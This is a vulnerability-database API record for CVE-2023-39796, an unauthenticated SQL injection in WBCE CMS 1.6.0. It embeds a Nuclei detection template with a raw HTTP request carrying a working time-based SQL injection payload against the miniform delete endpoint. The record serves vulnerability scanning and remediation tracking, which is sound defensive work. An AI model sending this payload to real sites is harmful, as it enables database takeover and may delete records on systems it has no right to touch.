{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-39796/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-39796/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-39796/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-39796/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-39796/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-39796"},"sightings":{"href":"/api/v1/sightings/cve-2023-39796"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-39796.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-39796\n\ninfo:\n  name: WBCE 1.6.0 - SQL Injection\n  author: youngpope\n  severity: critical\n  description: |\n    There is an sql injection vulnerability in \"miniform module\" which is a default module installed in the WBCE cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file \"/modules/miniform/ajax_delete_message.php\" there is no authentication check. On line 40 in this file, there is a DELETE query that is vulnerable, an attacker could jump from the query using the tick sign - `.\n  impact: |\n    Unauthenticated attackers can execute time-based SQL injection through the DB_RECORD_TABLE parameter in the miniform module to extract the complete CMS database and takeover the WBCE installation.\n  remediation: Fixed in version 1.6.1\n  reference:\n    - https://forum.wbce.org/viewtopic.php?pid=42046#p42046\n    - https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1\n    - https://pastebin.com/PBw5AvGp\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-39796\n    cwe-id: CWE-89\n    epss-score: 0.06146\n    epss-percentile: 0.93197\n    cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wbce\n    product: wbce_cms\n  tags: time-based-sqli,cve,cve2023,sqli,wbce,intrusive,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /modules/miniform/ajax_delete_message.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=7'\n          - 'status_code_1 == 200'\n          - 'contains(body, \"Record deleted successfully!\")'\n        condition: and\n# digest: 4a0a00473045022100e535de7cbb79307ec9e736a621b66183d923453bdb3347a1b2162a27d04e5a0802204dcca6ec0f0b09353e9a8e56f18fcd9863a8baaac939a18da958e6b4c65ba3e3:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-39796"}